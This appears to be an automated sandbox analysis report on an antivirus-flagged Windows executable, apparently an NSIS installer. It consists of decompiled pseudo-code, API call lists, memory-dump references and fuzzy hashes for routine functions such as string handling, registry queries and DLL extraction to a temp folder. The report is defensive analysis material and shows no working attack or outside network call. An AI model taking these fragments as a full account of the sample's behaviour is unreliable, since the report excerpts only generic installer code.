0x00000000
0x00000000
0x70b21285
0x70b2128a
0x70b2128f
0x70b21294
0x70b2129a
0x70b2129b
0x00000000
0x70b2129b
0x70b2125b
0x70b2125e
0x70b211bc
0x70b211bf
0x70b211c2
0x70b211cb
0x70b211d0
0x00000000
0x70b211d1
0x70b21264
0x70b21266
0x70b211a2
0x70b211a5
0x70b211a8
0x70b211b1
0x00000000
0x70b211b1
0x70b21164
0x70b21165
0x70b21177
0x70b21180
0x70b21184
0x70b2118e
0x70b21191
0x70b21193
0x70b21193
0x00000000
0x70b21165
0x70b21143
0x70b21218
0x70b2121d
0x70b21221
0x70b21223
0x70b2122c
0x70b2122f
0x70b21238
0x70b2123d
0x70b2123d
0x70b21247
0x70b2124a
0x00000000
0x70b21250
0x70b21149
0x70b2114c
0x70b211e9
0x70b211ed
0x70b211f7
0x70b211fb
0x70b21205
0x70b2120a
0x70b21211
0x00000000
0x70b21211
0x70b21152
0x70b21155
0x00000000
0x00000000
0x70b2115b
0x70b2115e
0x70b211b8
0x00000000
0x70b211b8
0x70b21160
0x70b21162
0x70b2119e
0x00000000
0x70b2119e
0x00000000
0x70b212a1
0x70b212a1
0x70b212ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 70B21171
GlobalAlloc.KERNEL32(00000040,?), ref: 70B211E3
GlobalFree.KERNEL32 ref: 70B2124A
GlobalFree.KERNEL32(?), ref: 70B2129B
GlobalFree.KERNEL32(00000000), ref: 70B212B1

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: b4655cf8f272e5400f228ab02f75b9b6c88ab90ffc8fcf10543aafeffd3c0309
Instruction ID: 8d28144c002b9c8b57557455f2671063ea4af65ba5d8881c33d054952fec5520
Opcode Fuzzy Hash: b4655cf8f272e5400f228ab02f75b9b6c88ab90ffc8fcf10543aafeffd3c0309
Instruction Fuzzy Hash: 4B5191B6900201DFD711CF65EC85A6A77F8FB98316B244919F90ADB321EB34EB12CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp$C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll
API String ID: 1659193697-4252931006
Opcode ID: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75AF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75AF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(00010418,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: eb34a040627e01bcb606dc2e4c4799520f54f2f9c4d469aea035b4a21a86aa31
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: eb34a040627e01bcb606dc2e4c4799520f54f2f9c4d469aea035b4a21a86aa31
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,75AF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E58(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405e59
0x00405e63
0x00405e66
0x00405e6c
0x00405e6d
0x00405e6e
0x00405e76
0x00000000
0x00000000
0x00000000
0x00405e76
0x00405e78
0x00405e80

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 70B2204D Relevance: 5.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 70B21E74
GlobalFree.KERNEL32(?), ref: 70B21E79
GlobalFree.KERNEL32(?), ref: 70B21E7E
GlobalFree.KERNEL32 ref: 70B22068

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 1b6b8df879728b5e109e4e43986625ba1d6460b5775daaeb3dd98ca6a2205bda
Instruction ID: 84b57688d6bcf5864de7f13defe457848063449b46ccde84f1a0f16da59a00d1
Opcode Fuzzy Hash: 1b6b8df879728b5e109e4e43986625ba1d6460b5775daaeb3dd98ca6a2205bda
Instruction Fuzzy Hash: 87219E76804645EFDB11CFA4E9806DEB7F5FF88316F20486AD0AED2240E774AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
